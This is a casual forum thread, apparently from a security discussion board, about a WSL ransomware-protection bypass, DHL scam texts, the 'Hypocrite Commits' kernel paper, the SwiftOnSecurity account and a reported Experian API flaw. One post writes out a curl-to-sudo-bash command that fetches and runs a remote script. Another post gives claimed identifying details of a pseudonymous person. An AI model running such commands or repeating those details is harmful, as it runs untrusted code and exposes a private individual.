Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

brand engager
Mar 23, 2011

Midjack posted:

read an uncomfortably graphic description

no thanks

Adbot
ADBOT LOVES YOU

Quackles
Aug 11, 2018

Pixels of Light.

PCjr sidecar posted:

yospos, bithc

bithcoin? :10bux:

Jabor
Jul 16, 2010

#1 Loser at SpaceChem

its a good description

Private Speech
Mar 30, 2011

I HAVE EVEN MORE WORTHLESS BEANIE BABIES IN MY COLLECTION THAN I HAVE WORTHLESS POSTS IN THE BEANIE BABY THREAD YET I STILL HAVE THE TEMERITY TO CRITICIZE OTHERS' COLLECTIONS

IF YOU SEE ME TALKING ABOUT BEANIE BABIES, PLEASE TELL ME TO

EAT. SHIT.

There's a weird thing going on, I had a DHL package delivered to me yesterday and today I got like 3 targeted DHL scam messages on my phone (inlcuding a whatsapp romance scam lmbo). Did they maybe compromise my DHL account somehow and knew I had a delivery? I use unique passwords everywhere but I guess it's possible.

Pile Of Garbage
May 28, 2007

if anyone cares, MSRC got back to me regarding the Ransomware Protection bypass i found with some commands (mainly "mv") in WSL1, they said that it's a known limitation and that they "don't consider this a defensible security boundary" so as such they're closing my case. that seems bs to me because Windows Defender is clearly being triggered but then failing to stop the file system operation or w/e.

on the one hand yeah OK, the lovely bypass with WSL1 i found would be hard for an attacked to use from the host OS and there are zero security controls for WSL2 accessing the host file system. that said though how long until people start getting their host OS popped because they did the old curl http://goodscript.ru/script.sh | sudo bash?

idk, seems crass and dismissive. tbh WSL should be mounting the host file system into the WSL instance as RO and make you do some fuckery to turn it RW

CyberPingu
Sep 15, 2013

If you're not striving to improve, you'll end up going backwards.
https://twitter.com/gossithedog/status/1386961687119597568

Cybernetic Vermin
Apr 18, 2005

Pile Of Garbage posted:

idk, seems crass and dismissive. tbh WSL should be mounting the host file system into the WSL instance as RO and make you do some fuckery to turn it RW

yeah, i see your point. otoh i suspect almost every person jumping through the hoops getting wsl2 setup will *also* immediately, as part of the list of hoops from a random website, also enable writing the host filesystem. kind of part of what wsl is (and what it is *not* is some secure enclave)

which might not be wise, but i can pretty easily see both points of view here.

Pile Of Garbage
May 28, 2007

Cybernetic Vermin posted:

yeah, i see your point. otoh i suspect almost every person jumping through the hoops getting wsl2 setup will *also* immediately, as part of the list of hoops from a random website, also enable writing the host filesystem. kind of part of what wsl is (and what it is *not* is some secure enclave)

which might not be wise, but i can pretty easily see both points of view here.

as far as i know the only options available are during distro init within WSL and pertain to poo poo like username/password. at no point during setup or distro install is the fact that "all your direct attached drives are going to be mounted RW under /mnt" ever broached. i guess there's probably some settings you can tweak but this is a major issue for anyone at all involved with endpoint control because the moment you let someone get WSL2 on their system they'll be able to bypass whatever.

i guess installation of the feature can be restricted by GPO or whatever but at the end of the day its convenience will have users demanding it, especially dinguses that know enough linux to be dangerous but refuse to learn how to use SSH to jump on a box you've prepared for them. also people will just BYOD...

Carrier
May 12, 2009

Private Speech posted:

There's a weird thing going on, I had a DHL package delivered to me yesterday and today I got like 3 targeted DHL scam messages on my phone (inlcuding a whatsapp romance scam lmbo). Did they maybe compromise my DHL account somehow and knew I had a delivery? I use unique passwords everywhere but I guess it's possible.

I've been getting these and "you just made a transaction on your bank account, click this here shady link to confirm" messages since shortly after the facebook leak, think its probably just a wide net thing

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

Private Speech posted:

given DHLs absolutely dogshit IT infrastructure and practices including but not limited to spoofing the customers own loving email address when sending you shipping notifications I would be in no way surprised if someone popped their poo poo

ymgve
Jan 2, 2004

:dukedog:
Offensive Clock
https://twitter.com/SwiftOnSecurity/status/1387421051689254914

reminds me of the kirk razor rants

Midjack
Dec 24, 2007

tbh the bill gates 5g vaccine joke is kind of wearing out its welcome.

mystes
May 31, 2006

Midjack posted:

Great, tell the antivaxers.

Pile Of Garbage
May 28, 2007

swiftonsec suckssss

champagne posting
Apr 5, 2006

YOU ARE A BRAIN
IN A BUNKER

Pile Of Garbage posted:

swiftonsec suckssss

post hole digger
Mar 21, 2011

Pile Of Garbage posted:

swiftonsec suckssss

that's right.

post hole digger
Mar 21, 2011

Midjack posted:

bill gates vax jokes were a psyop to cloak the fact that his devotion to patent rights is going to kill millions of people in the global south ha ha

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...

mystes posted:

Midjack
Dec 24, 2007

mystes posted:

they probably never thought it was a joke.

Kesper North
Nov 3, 2011

EMERGENCY POWER TO PARTY

Pile Of Garbage posted:

swiftonsec suckssss

What's wrong with them? I really like their short fiction :colbert:

hobbesmaster
Jan 28, 2008

https://www-users.cs.umn.edu/%7Ekjlu/papers/full-disclosure.pdf
“A Full Disclosure of the Case Study of the “Hypocrite Commits” Paper”

25 pages including lots of email trails for some reason, I’m just starting to look at it.

quote:

Patch 1 (Figure 11 in the paper). This is not a buggy patch. At first, we thought this patch was a "hypocrite commit" and submitted it to the community. However, after further checking, we confirmed that this patch is actually valid and would not introduce buggy code into the kernel, so we didn't stop the maintainer from continuing to apply the patch. Although this case is not buggy, error handling paths are often less taken care of, especially when the free function is custom. Sometimes even when the free function is commonly used like kfree, use-after-free is still introduced, and the patch is accepted and applied, such as https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f187b6974f6df (not from us, applied in 2020). Also, involving concurrency would make it much stealthier. Therefore, we believe that such a case, using a pointer in error paths after functions like close, disable, release, and destroy, is practical. We included this one in the paper to better illustrate such a representative case. However, since this specific patch is not a buggy patch, the paper should have explained this clearly.

:psyduck:

xtal
Jan 9, 2011

by Fluffdaddy
They really need to stop posting

The Fool
Oct 16, 2003

Kesper North posted:

What's wrong with them? I really like their short fiction :colbert:

I follow them and don’t mind them most of the time, but they are a mid-tier sysadmin that positions themselves as a security expert that only got notoriety because of their dumb gimmick

hobbesmaster
Jan 28, 2008

xtal posted:

They really need to stop posting

who the gently caress is scraeming "STOP PUBLISHING" at my house. show yourself, coward. i will never stop

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

the most interesting thing about swiftonsecurity is their follower count, which is a terrible thing to think about a person

Kesper North
Nov 3, 2011

EMERGENCY POWER TO PARTY

The Fool posted:

I follow them and don’t mind them most of the time, but they are a mid-tier sysadmin that positions themselves as a security expert that only got notoriety because of their dumb gimmick

u jelly

The Fool
Oct 16, 2003

Shouting NO! as I hide my 8 follower count

Wiggly Wayne DDS
Sep 11, 2010

they're a very useful identifier of who not to listen to, and for that i endorse their account still existing

mystes
May 31, 2006

The Fool posted:

Oh no you've found out the secret gimmick of posting silly stuff on the internet. Time to shut down the forums, folks.

Kesper North
Nov 3, 2011

EMERGENCY POWER TO PARTY
I regard them as a positive outreach type of personality of cybersecurity with the public at large that makes our industry slightly more comprehensible, but not so useful for people actually working in it. Working hard to bring outsiders in and make complex subjects more digestible has its own innate value that to me justifies the platform.

Sort of a popular science communicator, like Bill Nye, but in a furry costume instead of a bow tie.

infernal machines
Oct 11, 2012

we monitor many frequencies. we listen always. came a voice, out of the babel of tongues, speaking to us. it played us a mighty dub.

The Fool posted:

truly living the dream

in a well actually
Jan 26, 2011

dude, you gotta end it on the rhyme

<SoS> u think girls can’t be into computers check this out

* pile of old dell enterprise server poo poo *

like when atomictumbs posts ewaste its at least interesting stuff

Rufus Ping
Dec 27, 2006

I'm a Friend of Rodney Nano
That reminds me, it was dan kaminsky who accidentally revealed SoS's identity in a blog post. Windows network janitor from Texas called Daniel. Used to be lots of mopey tweets on his main account about the stress of being a loser with a secret double life online

Midjack
Dec 24, 2007

Rufus Ping posted:

That reminds me, it was dan kaminsky who accidentally revealed SoS's identity in a blog post. Windows network janitor from Texas called Daniel. Used to be lots of mopey tweets on his main account about the stress of being a loser with a secret double life online

that's kind of spider-man's gimmick isn't it, boring daily life with more colorful hero persona?

mystes
May 31, 2006

Midjack posted:

that's kind of spider-man's gimmick isn't it, boring daily life with more colorful hero persona?
No that's (checks note) every super hero.

Kesper North
Nov 3, 2011

EMERGENCY POWER TO PARTY
i have bad news:

We are all janitors

pseudorandom name
May 6, 2007

hey, that's not true

some of us are floor shitters

Kesper North
Nov 3, 2011

EMERGENCY POWER TO PARTY

pseudorandom name posted:

hey, that's not true

some of us are floor shitters

yeah but you contain your poop, you clean your poop, ultimately still dealing with poop (this is why i usually say we're plumbers instead)

post hole digger
Mar 21, 2011

Rufus Ping posted:

W

Adbot
ADBOT LOVES YOU

Kesper North
Nov 3, 2011

EMERGENCY POWER TO PARTY
In secfuck news

quote:

Big-three consumer credit bureau Experian just fixed a weakness with a partner website that let anyone look up the credit score of tens of millions of Americans just by supplying their name and mailing address, KrebsOnSecurity has learned. Experian says it has plugged the data leak, but the researcher who reported the finding says he fears the same weakness may be present at countless other lending websites that work with the credit bureau.

Bill Demirkapi, an independent security researcher who’s currently a sophomore at the Rochester Institute of Technology, said he discovered the data exposure while shopping around for student loan vendors online.

Demirkapi encountered one lender’s site that offered to check his loan eligibility by entering his name, address and date of birth. Peering at the code behind this lookup page, he was able to see it invoked an Experian Application Programming Interface or API — a capability that allows lenders to automate queries for FICO credit scores from the credit bureau.

“No one should be able to perform an Experian credit check with only publicly available information,” Demirkapi said. “Experian should mandate non-public information for promotional inquiries, otherwise an attacker who found a single vulnerability in a vendor could easily abuse Experian’s system.”

Demirkapi found the Experian API could be accessed directly without any sort of authentication, and that entering all zeros in the “date of birth” field let him then pull a person’s credit score. He even built a handy command-line tool to automate the lookups, which he dubbed “Bill’s Cool Credit Score Lookup Utility.”

https://krebsonsecurity.com/2021/04/experian-api-exposed-credit-scores-of-most-americans/